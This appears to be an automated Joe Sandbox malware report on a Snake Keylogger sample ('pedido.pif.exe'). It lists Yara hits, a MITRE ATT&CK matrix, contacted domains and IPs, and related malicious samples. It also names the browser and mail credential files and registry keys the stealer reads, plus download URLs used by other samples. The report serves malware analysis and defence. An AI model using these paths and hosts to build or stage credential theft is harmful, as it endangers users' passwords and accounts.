Source: Yara match	File source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3875604256.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3874673292.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3874673292.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3875604256.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3874673292.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3875604256.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pedido.pif.exe PID: 5188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RePUtenbQjvc.exe PID: 5040, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\pedido.pif.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pedido.pif.exe PID: 5188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RePUtenbQjvc.exe PID: 5040, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 7.2.pedido.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3875604256.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3874673292.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3874673292.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3875604256.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3874673292.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3875604256.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pedido.pif.exe PID: 5188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RePUtenbQjvc.exe PID: 5040, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pedido.pif.exe	37%	ReversingLabs	Win32.Trojan.CrypterX
pedido.pif.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	37%	ReversingLabs	Win32.Trojan.CrypterX

Source	Detection	Scanner	Label
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/173.254.250.77	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org	pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B65000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/173.254.250.77$	pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B65000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B65000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	pedido.pif.exe, 00000000.00000002.1494745105.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 00000009.00000002.1562113138.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/GameInfoDataSet.xsdGFinalProjectTV.Properties.Resources	pedido.pif.exe, RePUtenbQjvc.exe.0.dr	false		unknown
http://checkip.dyndns.org/q	pedido.pif.exe, 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, RePUtenbQjvc.exe, 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	pedido.pif.exe, 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, RePUtenbQjvc.exe, 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
50.31.176.103	unknown	United States	23352	SERVERCENTRALUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545937
Start date and time:	2024-10-31 10:36:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pedido.pif.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@16/11@2/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 319 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RePUtenbQjvc.exe, PID 5040 because it is empty
Execution Graph export aborted for target pedido.pif.exe, PID 5188 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: pedido.pif.exe

Simulations

Behavior and APIs

Time	Type	Description
05:37:26	API Interceptor	8043545x Sleep call for process: pedido.pif.exe modified
05:37:27	API Interceptor	13x Sleep call for process: powershell.exe modified
05:37:33	API Interceptor	5703891x Sleep call for process: RePUtenbQjvc.exe modified
10:37:28	Task Scheduler	Run new task: RePUtenbQjvc path: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	VfKk5EmvwW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	083098cm.n9shteam.in/vmBase.php
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/CEqTVkxM/download
	0JLWNg4Sz1.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	977255cm.nyashkoon.in/secureWindows.php
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/jI82Ms6K/download
	9D7RwuJrth.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
	DBUfLVzZhf.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	R5AREmpD4S.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	7950COPY.exe	Get hash	malicious	FormBook	Browse	www.globaltrend.xyz/b2h2/
	transferencia interbancaria_667553466579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/Gitmx
193.122.130.0	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Ndnownts.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	PRESUPUESTO DE NOVIEMBRE...exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	PG567777878-H677889978-6G89O9I4567778.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	PRESUPUESTO DE NOVIEMBRE...exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	PG567777878-H677889978-6G89O9I4567778.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PRESUPUESTO DE NOVIEMBRE...exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	.gov.ua.html	Get hash	malicious	Unknown	Browse	172.67.142.245
	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	http://www.thearchiterra.gr/	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	.gov.ua.html	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm	Browse	188.114.97.3
